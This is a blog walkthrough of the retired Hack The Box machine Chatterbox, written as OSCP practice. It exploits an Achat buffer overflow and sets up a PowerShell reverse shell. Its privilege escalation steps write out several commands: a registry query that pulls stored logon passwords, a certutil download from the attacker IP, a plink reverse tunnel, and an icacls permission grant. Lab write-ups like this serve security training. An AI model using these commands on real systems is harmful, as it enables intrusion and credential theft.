Chatterbox walkthrough HTB Retired Machine 03: OSCP-like Box. without Metasploit

6 min readJan 3, 2024

Fast forward to this series, I am working on all of the boxes that lead to OSCP. Mainly focusing on Thinking Methodology “Why we are doing what we’re doing.” End of the road, I am gonna create a mind map. Please shower me with constructive feedback. I try to improve as I progress.

Reconnaissance:

Analyzing Nmap result:

There’s a 9255 and 9256 ports one is TCP & the other one is UDP. Both are functioning as an Achat Chat system httpd.

The operating system is Windows 7601 Service Pack 1.

Enumeration:

Buffer Overflow Exploitation.

The port we have discovered is 9256(UDP, Achat). Upon searching for vulnerabilities through searchsploit.

we can spot this vulnerability, Remote Buffer Overflow.

Upon inspecting the payload, we can see that all the bad characters are already placed for us. Upon execution, it is running calc.exe in order for the payload to be worked.

Exploitation:

There are 2 ways of getting an initial foothold onto the system with this exploit. It can be more with Metasploit exploit. This procedure is based on no metasploit methods. This is better because this machine resembles OSCP boxes, where the use of Metasploit is limited to one machine.

First Approach:

Seeing the payload size is limited to around 512 bytes, which is relatively very low.

we can normally use staged payloads here. So, it will be taking fewer bytes now. And execute back from the victim machine later.

So, for this exploit to work, we have to create a payload. The bad characters are already written for us inside the code. Just needed to add address and payload options to gain a shell. In this case a reverse shell. So you can generate the following payload.

Example payload:

For this method to work, we need to run a Python server. While hosting the InvokeTcp Reverse shell PowerShell file from Nishang’s Powershell scripts.

Don’t forget to add Invoke-PowershellTcp -Reverse -IPAddress <IP> -Port 443 at the end of the file inside the Powershell script which you have been uploading.

And and, This can get you the shell you are looking for…

Method #2:

Non-Staged vs Staged Payloads:

And Tada!! User flag is found.

Post-Exploitation:

Still, we can’t access the root.txt inside the administrator directory.

I am using the following guide for enumeration. Please follow along to get a comprehensive understanding of Windows privilege escalation.

reg query “HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon” 2>nul | findstr “DefaultUserName DefaultDomainName DefaultPassword”

we got the Alfred user’s password. we got some results out of system enumeration.

Let us continue to surf more with network enumeration.
netstat -ano → for information about ports that were running on the system.

Seem’s like these two ports 135 and 445 are invisible from our scan.

So, these ports are open on the local network and invisible to the outside network with an Nmap scan. And yes we can absolutely use port forwarding similar to the SSH port forwarding. Since we have no active SSH connection right now.

Using a Putty tunnel can be a better option since it supports port forwarding. If we are able to establish a putty connection from the Alfred machine. Then we might have a chance of escalating the privileges further.

certutil -urlcache -f http://10.10.14.89/plink.exe plink.exe

I was using this 32-bit executable from the Putty website.

after getting our putty on the victim machine.

Make sure the root access is permitted from our Kali machine with making sure changing this setting and configuring the SSH at line 32.

Change this from 22 to a random working port if this method doesn’t work then try again. Since my HTB is blocking away 22 ports for some reason.

plink.exe -l kali -pw toor -P 4545 -R 445:127.0.0.1:445 10.10.14.89

Can get us access to our root shell. So, basically, it sign in our box as root to the inside chatterbox machine. This didn’t work in my case.

Going forward I have tried the Metasploit method but it didn’t as well.

Method #2:

Since we are given access to the Administrator directory but seems like we don’t have access to the root.txt file inside it.

I was running around trying gigantic things this is so simple approach.

ICACLS root.txt /grant “Users”: F

After this, we can easily access it.

And we got ROOOOOT Flag!!

In-summary:

Honestly, This box is a bit annoying to deal with. You need to do as many resets as possible constantly to get the exploits to work. Since other people will be utilizing the same port numbers as you.

But it still is a good learning curve,

You’ll get to use System Enumeration commands to find hidden passwords. And how to Execute PowerShell commands on the victim machine remotely with Windows/exec CMD. File transfers. Upgrading the Netcat shell to Meterpreter shell. Finally Elevating File permissions. I did learn a lot of cool tricks out of this machine. Hopefully, you had fun too.